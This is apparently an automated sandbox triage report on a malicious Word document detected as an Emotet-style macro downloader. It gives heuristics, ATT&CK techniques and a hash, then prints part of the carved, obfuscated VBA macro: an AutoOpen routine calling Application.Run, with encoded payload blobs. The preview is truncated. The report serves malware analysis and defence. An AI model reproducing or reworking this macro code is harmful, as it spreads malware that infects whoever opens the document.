Verdict: MALICIOUS
Risk score: 224

Malware insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes CreateObject and a call to Application.Run, suggesting it attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43252 bytes |

SHA-256: 63eb53d3e4cd7b4b4bae93bbf527d10c6d0d092903043fe8e926e4df0f33c868

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 20 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "CBFdkWFfszQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
lRAji = CByte(bGLhHi)
llNaV = sHZZJ
MtXhVj = Cos(54221 - Oct(24075 + UNrPh * AXuaR - CBool(OcXGFA)))
Application.Run fOLsqm + "NdRpXWhLo" + kEYpw, SVRXVK + QYDIORMfKTFqki + wsjfws
zQzaQ = CByte(phlIVB)
MivzEc = OtLAlu
qmfjt = Cos(97166 - Oct(43665 + TFwZP * kjIBUh - CBool(OwkaWF)))
End Sub
Attribute VB_Name = "DFwpWVz"
Sub GccCGo(pAfMw)
KCzQMl = CByte(pvFWsV)
NHICt = qdjYRb
zGjvKJ = Cos(45666 - Oct(87583 + wYKkX * KWGKl - CBool(AiscS)))
End Sub
Function QYDIORMfKTFqki()
On Error Resume Next
IuWcG = CByte(vrEtoW)
izuIuD = uLIVEP
jZJnVr = Cos(70010 - Oct(47469 + dGYZm * pcblsF - CBool(HWLLW)))
isHrsjiFEim = ZOzvBz("m0mAwAGUAMQBmADMANgA5AGMAYwBjAGMAMQA1AGQANgAzADIAMQBjADIAMwAzADUAMgA2ADIAMAAyADIAOABiADMAMwBiADAANABJlk", 4 + JYVWp - JYVWp, 97 + JYVWp - JYVWp)
wlBXrz = CByte(SvGSi)
FvRCVd = SWjuTX
RRnbJV = Cos(18390 - Oct(54687 + cijca * tWIGv - CBool(WpTpiX)))
sSmPU = CByte(DbTku)
CGOznV = fjvwR
VvUjKY = Cos(1361 - Oct(16094 + DdjaXu * wVImOk - CBool(IUBGa)))
wuUpHdBrUI = ZOzvBz("TAOQBkADIANQjWuSH.", 2 + ZFGDT - ZFGDT, 11 + ZFGDT - ZFGDT)
QzUUd = CByte(aivILt)
DDkQNz = inZpi
lbMMJ = Cos(34778 - Oct(49702 + hGJOwY * NBNwt - CBool(jQXDo)))
YdSzq = CByte(SuqtI)
ZmKLWt = jCiKt
RPGsFw = Cos(46060 - Oct(95526 + ziaNu * oNwoQf - CBool(XPGrD)))
djbXhjJTr = ZOzvBz("oihtH2IAZgBkADQAMgBkADEANAA1AGUAMAAzAGIANQBmADQAMAA0ADEAOQAzAGUAZQA1ADEAYwBmADcANQBhAGUANwBjcf", 7 + PddXi - PddXi, 86 + PddXi - PddXi)
qKtTY = CByte(ZzMBl)
kADmjl = ziuof
cFGsr = Cos(72947 - Oct(26356 + QHKGKB * VtbMN - CBool(jiHkiV)))
jjpkEu = CByte(GPwivv)
EOjssw = lhDKOF
LzvQM = Cos(40761 - Oct(79715 + pirSU * uizItR - CBool(zsDTkc)))
tAtjcVcsa = ZOzvBz("3ADEAYQBhAGIANgBimjmGcj%K", 2 + EcvVOz - EcvVOz, 16 + EcvVOz - EcvVOz)
CmaqpY = CByte(PASjaB)
YAAacM = wECVnj
Hswcs = Cos(88209 - Oct(27668 + IBdvq * hjYSQl - CBool(sDtHQE)))
NlHuiz = CByte(LrNvD)
cFsdf = wFvlZu
BvzjBS = Cos(31479 - Oct(42099 + iLsXUr * OEbbHN - CBool(TjlVlY)))
zFXJYu = ZOzvBz("jDfIWIAOABhAGEAMQA1ADYANQAwADgAYwBhADkAMABjADcAYQA1ADQAMgA4ADMAMgAwAGMAYgA4ADQAMAAyADEAYgA4ADcAZAA2ADIAOAA4AGUAYQBkADMAYwBlADYAMwAJo%7", 6 + hXVCs - hXVCs, 125 + hXVCs - hXVCs)
zhACw = CByte(NLMcnl)
XhlIXF = hhwTX
JdwPzf = Cos(95447 - Oct(25550 + drVXQb * sznWQ - CBool(mwdzj)))
RpTItv = CByte(IYUnL)
MdaAZ = qWmZEa
tMAUS = Cos(73108 - Oct(8995 + MvDjW * bAYmj - CBool(akHPwP)))
ANJPLnjB = ZOzvBz("QIrADIAOABkAGIANABiAGIAMgBkADEAOAA2AGIAMQA3AGQANQAzAGEAZAA3ADgAZQBmADEAYQA4AGIAYQAwADIAMgBmAGYAZgBhAGUANgBlADIANQA0AHln", 4 + lSihi - lSihi, 113 + lSihi - lSihi)
ocfQP = CByte(XBpHEC)
GFAhX = DXPVO
UdvJFk = Cos(45956 - Oct(3946 + QZhinC * NlsTki - CBool(UkZsfM)))
YnlIJ = CByte(ahavnt)
jhVDz = zXrAbO
QBZjU = Cos(44835 - Oct(29926 + kcPJu * NivDZI - CBool(HiMliR)))
WsBqmWcH = ZOzvBz("PO65QAzADkAMwBkAGUAOQBkAGQANwA1ADYAj5", 5 + ZHQivE - ZHQivE, 31 + ZHQivE - ZHQivE)
vhnJt = CByte(TZHrbQ)
PzEFtC = ltwwCG
JSMzpF = Cos(15119 - Oct(26100 + pGQFc * WDcIiN - CBool(dHrbX)))
wqjbL = CByte(aclRlK)
nUTVW = jzJPo
KlHtS = Cos(82509 - Oct(9692 + stzoB * JDoOi - CBool(nBGPJ)))
UlABwJwaC = ZOzvBz("JT5ADEAOQA3ADAANABmADcANQBkAGIAOAA3AGEAOQBmAGMAZQA1ADEAMQA2ADcAYwA0AGEAMQBiADQANQA2ADIAYgAzADUAMAAwAGIAOAA1ADIANQBiADcAOAAyAGQAMwBjADAAMQBhADgAMwA2AGEAYQAyADkAYwBkAGEAMgA0ADIAOQA2ADEANwBjAGIAYgA0ADAAvi2o", 3 + BkqHn - BkqHn, 195 + BkqHn - BkqHn)
wvJcm = CByte(vSBvTi)
ajrVu = iTwLd
vjiUJ = Cos(59325 - Oct(84705 + ssJJQG * tjYOk - CBool(vHZwf)))
izGKDu = CByte(MQOmp)
XEiMRB = PhjGIT
QoWjoD = Cos(41344 - Oct(25553 + vOLCS * XbJPZC - CBool(amczC)))
RojbpaJTVBS = ZOzvBz("CDkAZQA2ADUAYQBkADIAZAAwADUAZgBlADUAMwBlADQAOAAwAGMAYgAzADIANQAzAGY%2wqL", 2 + siGBj - siGBj, 66 + siGBj - siGBj)
wQABkw = CByte(XtfwmL)
iiwFw = iKHzt
wuNkHr = Cos(2434 - Oct(80685 + GvMbG * JdvLcN - CBool(n
... (truncated)